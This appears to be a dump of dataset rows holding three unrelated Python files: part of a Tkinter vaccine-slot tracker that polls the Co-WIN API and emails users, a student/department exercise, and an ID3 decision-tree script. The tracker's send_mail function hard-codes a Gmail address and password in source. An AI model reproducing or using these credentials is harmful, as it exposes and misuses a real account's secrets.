        # age: 0 for the 18-44 band, 1 for 45+ (set by the UI radio buttons).
        self.p = p
        self.d = d
        self.m = m
        self.age = age
        self.stop = 0  # set to 1 by is_available() when the API returns no centres
        self.tracker()
    def tracker(self):
        """Poll the Co-WIN findByPin endpoint up to 6 times, 10 s apart."""
        flag = 0  # becomes 1 once an available slot has been found
        for t in range(6):
            URL = f"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByPin?pincode={self.p}&date={self.d}"
            # NOTE(review): header key "User Agent" lacks the hyphen -- the
            # standard request header is "User-Agent"; confirm this is intended.
            headers = {"User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"}
            page = requests.get(URL, headers=headers)
            # The endpoint returns JSON; it is stringified here and handed to
            # the ad-hoc character parser str_to_list() instead of page.json().
            soup = BeautifulSoup(page.content, "html.parser")
            data = str(soup)
            final_data = self.str_to_list(data)
            if self.is_available(final_data):
                flag = 1
                break
            if self.stop == 1:
                break
            time.sleep(10)  # wait before the next poll
        # Nothing found in any round and polling was not aborted: tell the user.
        if flag == 0 and self.stop == 0:
            tkm.showinfo("showinfo", "No Vaccines Available")
    def is_available(self, final_data):
        """Return True (and send mail) if a centre matching self.age has capacity.

        Picks the centre with the largest ``available_capacity`` among those
        whose minimum age matches the requested band. Sets ``self.stop`` when
        the API returned no centres at all, which aborts further polling.
        """
        if len(final_data) == 0:
            print(tkm.showinfo("showinfo", "No Vaccines Available"))
            self.stop = 1
        else:
            check = "available_capacity"
            flag = 0  # NOTE(review): unused local, kept for byte-compatibility
            maxcap = -1
            tempdct = {}  # best matching centre record found so far
            for fd in final_data:
                # Map the API's minimum age onto the UI's 0 (18-44) / 1 (45+).
                age_lim = int(fd["min_age_limit"])
                if (age_lim == 18):
                    age_lim = 0
                else:
                    age_lim = 1
                if int(fd[check]) > maxcap and age_lim == self.age:
                    maxcap = int(fd[check])
                    tempdct = fd
            if len(tempdct) == 0:
                print(tkm.showinfo("showinfo", "No Vaccines Available"))
            elif int(tempdct[check]) > 0:
                self.send_mail(tempdct)
                return True
        return False
    def str_to_list(self, data):
        """Parse the stringified JSON response into a list of flat dicts.

        Hand-rolled character scanner: skips the leading '{"sessions": ['
        prefix (13 chars), splits records on '{'/'}' braces, then splits
        each record into key/value pairs on the first ':' of each pair.
        Nested structures are not supported; values keep only their text.
        """
        temp = ""
        org_data = []  # one raw comma-stripped record string per centre
        for i in range(13, len(data) - 1):
            if data[i] == '{' or data[i] == ',':
                continue
            elif data[i] == '}':
                org_data.append(temp)
                temp = ""
            else:
                temp += data[i]
        final_data = []  # parsed {key: value} dict per centre
        for d in org_data:
            dct = {}
            p = ''   # previous character, used to spot closing quotes
            cnt = 0  # 0 while reading a key, 1 while reading a value
            t1 = ""  # current key accumulator
            t2 = ""  # current value accumulator
            for c in d:
                # A quote while reading a value (not right after ':')
                # terminates the pair: store it and reset for the next key.
                if c == '"' and cnt == 1 and p != ':':
                    t1 = t1.replace('"', '')
                    t2 = t2.replace('"', '')
                    dct[t1] = t2
                    t1 = ""
                    t2 = ""
                    cnt = 0
                # First ':' switches from key-mode to value-mode.
                if c == ':' and cnt == 0:
                    cnt = cnt + 1
                    p = c
                    continue
                if cnt == 0:
                    t1 += c
                else:
                    t2 += c
                p = c
            final_data.append(dct)
        return final_data
    def send_mail(self, arg):
        """E-mail the details of centre record ``arg`` to ``self.m`` via Gmail.

        NOTE(review): credentials are hard-coded in source; they should be
        moved to environment variables or a config file.
        """
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.ehlo()
        server.starttls()  # upgrade to TLS before logging in
        server.ehlo()
        server.login("vaxtracker2021@gmail.com", "tracker2021vaccine")
        subject = "Vaccination slot is available"
        # Assemble the message body line by line from the centre record.
        b1 = "Hospital: " + arg["name"] + ", " + arg["address"] + "\n" + "Pin Code: " + arg["pincode"] + "\n"
        b2 = "Minimum age limit: " + arg["min_age_limit"] + "\n"
        b3 = "Vaccine: " + arg["vaccine"] + "\n"
        b4 = "No. of doses: " + arg['available_capacity'] + "\n"
        b5 = "Dose 1: " + arg['available_capacity_dose1'] + "\n"
        b6 = "Dose 2: " + arg['available_capacity_dose2'] + "\n"
        b7 = "Fee: " + arg["fee"] + "\n"
        b8= "Book appointment here: https://selfregistration.cowin.gov.in/"+"\n"
        body = b1 + b2 + b3 + b4 + b5 + b6 + b7+b8
        message = f"subject: {subject}\n\n {body}"
        server.sendmail("vaxtracker2021@gmail.com", self.m, message)
        server.quit()
        print("Your mail has been sent successfully")
class Application(tk.Frame):
    """Tkinter form collecting pin code, date, e-mail and age band.

    On submit, the entered values are handed to ``Processor``, which
    starts polling the Co-WIN API immediately.
    """
    def __init__(self, master=None):
        super().__init__(master)
        self.master = master
        self.grid()
        self.create_layout()
    def create_layout(self):
        """Build the static grid of labels, entries and buttons."""
        # Row 0: pin code label + entry.
        label_pin = tk.Label(self)
        label_pin["text"] = "PinCode"
        label_pin["font"] = "Calibri 15"
        label_pin["height"] = 2
        label_pin.grid(row=0, column=0)
        # Row 1: date label + entry.
        label_date = tk.Label(self)
        label_date["text"] = "Date"
        label_date["font"] = "Calibri 15"
        label_date["height"] = 1
        label_date.grid(row=1, column=0)
        # Row 2: e-mail label + entry.
        label_mail = tk.Label(self)
        label_mail["text"] = "UserEmail"
        label_mail["font"] = "Calibri 15"
        label_mail["height"] = 2
        label_mail["width"] = 10
        label_mail.grid(row=2, column=0)
        # Row 3: age-band label + two radio buttons.
        label_age = tk.Label(self)
        label_age["text"] = "AgeLimit"
        label_age["font"] = "Calibri 15"
        label_age["height"] = 1
        label_age.grid(row=3, column=0)
        # Entries are kept on self so on_click_sub can read them later.
        self.entry_pin = tk.Entry(self)
        self.entry_pin["font"] = "Calibri 15"
        self.entry_pin["width"] = 20
        self.entry_pin.grid(row=0, column=1, columnspan=2)
        self.entry_date = tk.Entry(self)
        self.entry_date["font"] = "Calibri 15"
        self.entry_date["width"] = 20
        self.entry_date.grid(row=1, column=1, columnspan=2)
        self.entry_mail = tk.Entry(self)
        self.entry_mail["font"] = "Calibri 15"
        self.entry_mail["width"] = 20
        self.entry_mail.grid(row=2, column=1, columnspan=2)
        # Shared variable for the age radio buttons: 0 = 18-44, 1 = 45+.
        self.val = tk.IntVar()
        rb18 = tk.Radiobutton(self)
        rb18["text"] = "18-44"
        rb18["value"] = 0
        rb18["variable"] = self.val
        rb18["font"] = "Calibri 11"
        rb18.grid(row=3, column=1)
        rb45 = tk.Radiobutton(self)
        rb45["text"] = "45+"
        rb45["value"] = 1
        rb45["variable"] = self.val
        rb45["font"] = "Calibri 11"
        rb45.grid(row=3, column=2)
        # Submit button wired to the form handler.
        btn_sub = tk.Button(self)
        btn_sub["text"] = "SUBMIT"
        btn_sub["font"] = "Calibri 9 bold"
        btn_sub["command"] = self.on_click_sub
        btn_sub.grid(row=4, column=1)
    def on_click_sub(self):
        """Validate the form and launch a Processor (blocks the UI while polling)."""
        pin = str(self.entry_pin.get())
        date = str(self.entry_date.get())
        mail = str(self.entry_mail.get())
        age = self.val.get()
        if pin == "" or date == "" or mail == "":
            print(tkm.showerror("showerror", "Enter Valid Data"))
        else:
            # Processor.__init__ starts polling immediately.
            self.pro = Processor(pin, date, mail, age)
# Build the main window and mount the tracker form in it.
root = tk.Tk()
root.geometry("350x200")
root.title("Vaccine Tracker")
app = Application(master = root)
app.mainloop() | ayan07-eng/VaccineTracker-main | VaccineTracker-main/main.py | main.py | py | 7,077 | python | en | code | 1 | github-code | 90 |
class Student:
    """A student enrolled in a department, taking a set of subjects."""
    def __init__(self, id_no, name, dept, subject_names):
        # Identity and enrolment details.
        self.id_no = id_no
        self.name = name
        self.dept = dept
        self.subject_names = subject_names
    def get_student_department(self):
        """Return the department this student belongs to."""
        return self.dept
    def get_student_subjects(self):
        """Return the list of subjects the student has taken."""
        return self.subject_names
class Department:
    """An academic department: its name, enrolled students and subjects."""
    def __init__(self, department_name, students, department_subjects):
        self.department_name = department_name
        self.students = students
        self.department_subjects = department_subjects
    def get_students_name(self):
        """Return the names of the students enrolled here."""
        return self.students
    def get_department_subjects(self):
        """Return the subjects this department offers."""
        return self.department_subjects
    def get_department_name(self):
        """Return the department's name."""
        return self.department_name
def overlapping_subjects_among_departments():
    """Return a message listing subjects offered by every department.

    Intersects the subject lists of all departments in the module-level
    ``department_obj_list``, preserving the subject order of the first
    department.
    """
    common_subjects = []
    for department in department_obj_list:
        subjects = department.get_department_subjects()
        if not common_subjects:
            # Seed the running intersection with the first department.
            common_subjects = subjects
        else:
            # Keep only subjects this department also offers.
            common_subjects = [s for s in common_subjects if s in subjects]
    return 'Subjects that overlap between various departments: {}'.format(common_subjects)
def more_than_three_subject():
    """Return a message naming departments with students taking > 3 courses.

    Scans the module-level ``student_obj_list``; each qualifying
    department is listed once, in first-encounter order.
    """
    dept_list = []
    for student in student_obj_list:
        if len(student.get_student_subjects()) <= 3:
            continue
        dept = student.get_student_department()
        if dept not in dept_list:
            dept_list.append(dept)
    return '\nName of the departments where students take more than 3 courses : {}\n'.format(dept_list)
def display_students_name_in_the_department():
    """Prompt for a department name and print that department's students.

    Fix: the original printed 'wrong input' once for EVERY non-matching
    department while scanning (the else was attached to the inner if),
    so valid input could still produce error messages. Now the error is
    reported exactly once, and only when no department matches.
    """
    user_department_name = input('Which department students name you want to see? \nmech\ncivil\ncse\nit \nType any one: ').lower().strip()
    for department in department_obj_list:
        if department.get_department_name() == user_department_name:
            print('\n{} department students are: {}'.format(department.get_department_name(), department.get_students_name()))
            return
    # No department matched the entered name.
    print('\nwrong input')
# Fixture data: four departments with their students and subject lists.
department1 = Department('mech', ['yogesh', 'ram', 'venkat'], ['dynamics', 'fluid mechanics', 'english', 'thermodynamics'])
department2 = Department('civil', ['leo'], ['construction', 'structural', 'english', 'finite particles'])
department3 = Department('cse', ['ajay', 'sweetha'], ['html', 'python', 'english', 'java'])
department4 = Department('it', ['ruby', 'anandh', 'andharipa'], ['sql', 'python', 'english', 'java', 'oracle'])
department_obj_list = [department1, department2, department3, department4]
# Fixture data: nine students. NOTE(review): department4 lists
# 'andharipa' while student7 is named 'andhripa' -- confirm spelling.
student1 = Student(9144516, 'yogesh', 'MECH', ['english', 'fluid mechanics', 'dynamics'])
student2 = Student(9145212, 'ram', 'MECH', ['dynamics', 'fluid mechanics', 'english'])
student3 = Student(9143156, 'venkat', 'MECH', ['english', 'fluid mechanics', 'dynamics'])
student4 = Student(9126545, 'ruby', 'IT', ['sql', 'python', 'english', 'java'])
student5 = Student(9124841, 'anandh', 'IT', ['english', 'python', 'sql'])
student6 = Student(9159872, 'ajay', 'CSE', ['html', 'python', 'english'])
student7 = Student(9122476, 'andhripa', 'IT', ['english', 'python', 'sql', 'java'])
student8 = Student(9173245, 'leo', 'CIVIL', ['construction', 'structural', 'english'])
student9 = Student(9153587, 'sweetha', 'CSE', ['english', 'python', 'html'])
student_obj_list = [student1, student2, student3, student4, student5, student6, student7, student8, student9]
# Run the three queries against the fixtures above.
display_students_name_in_the_department()
print(more_than_three_subject())
print(overlapping_subjects_among_departments())
| yogeshjean12/Thoughtworks-Python-Assignments | department_problem.py | department_problem.py | py | 3,725 | python | en | code | 0 | github-code | 90 |
40756109049 | from math import log
import operator
def calShannon(dataSet):
    """Compute the Shannon entropy of the class labels in ``dataSet``.

    Each record is a list whose last element is the class label.
    Returns ``-sum(p * log2(p))`` over the label distribution.
    """
    total = len(dataSet)
    counts = {}
    # Tally how often each class label occurs.
    for record in dataSet:
        label = record[-1]
        counts[label] = counts.get(label, 0) + 1
    entropy = 0.0
    for freq in counts.values():
        p = freq / total
        entropy -= p * log(p, 2)
    return entropy
def createDataSet():
    """Return the toy classification data set and its feature names.

    Each record is [feature0, feature1, class_label].
    """
    dataSet = [
        [1, 1, 'yes'],
        [1, 1, 'yes'],
        [1, 0, 'no'],
        [0, 1, 'no'],
        [0, 1, 'no'],
    ]
    labels = ['no surfacing', 'flippers']
    return dataSet, labels
def splitDataSet(dataSet, axis, value):
    """Select the rows whose feature at ``axis`` equals ``value``.

    The matched feature column is removed from each returned row, so the
    result is ready for the next level of the tree.
    """
    return [row[:axis] + row[axis + 1:] for row in dataSet if row[axis] == value]
def choose(dataSet):
    """Return the index of the feature whose split maximises information gain.

    Implements the ID3 criterion: for each feature, compute the weighted
    entropy of the partition it induces and compare against the entropy
    of the unsplit data. Returns -1 when no split improves on zero gain.
    """
    feature_count = len(dataSet[0]) - 1   # last column is the class label
    base_entropy = calShannon(dataSet)
    best_gain, best_feature = 0.0, -1
    for feat in range(feature_count):
        values = {row[feat] for row in dataSet}
        split_entropy = 0.0
        for value in values:
            subset = splitDataSet(dataSet, feat, value)
            weight = len(subset) / float(len(dataSet))
            split_entropy += weight * calShannon(subset)
        gain = base_entropy - split_entropy
        if gain > best_gain:
            best_gain, best_feature = gain, feat
    return best_feature
def majorityCnt(classList):
    """Return the most frequent class label in ``classList``.

    Ties are broken in favour of the label encountered first, matching
    the stable-sort behaviour of the original implementation.
    """
    tally = {}
    for label in classList:
        tally[label] = tally.get(label, 0) + 1
    # max() returns the first maximal item in insertion order.
    return max(tally.items(), key=operator.itemgetter(1))[0]
def createTrees(dataSet, labels):
    """Recursively build an ID3 decision tree as nested dicts.

    Parameters
    ----------
    dataSet : list[list]
        Records whose last element is the class label.
    labels : list[str]
        Feature names aligned with the feature columns. The caller's
        list is no longer mutated (fix: the original ``del labels[...]``
        removed an entry from the caller's list as a side effect).

    Returns
    -------
    dict or label
        {feature_name: {feature_value: subtree_or_label}}, or a bare
        class label at the leaves.
    """
    classList = [example[-1] for example in dataSet]
    # All records share one class: this branch is a pure leaf.
    if classList.count(classList[0]) == len(classList):
        return classList[0]
    # No features left to split on: fall back to a majority vote.
    if len(dataSet[0]) == 1:
        return majorityCnt(classList)
    bestFeat = choose(dataSet)
    labels = labels[:]            # work on a copy; never mutate the caller's list
    bestLabel = labels.pop(bestFeat)
    myTree = {bestLabel: {}}
    for value in set(example[bestFeat] for example in dataSet):
        myTree[bestLabel][value] = createTrees(splitDataSet(dataSet, bestFeat, value), labels[:])
    return myTree
# Build the demo data set and grow the decision tree from it.
myData, labels = createDataSet()
myTree = createTrees(myData, labels)
print(myTree) | qzylalala/MachineLearning | Trees/trees.py | trees.py | py | 2,757 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.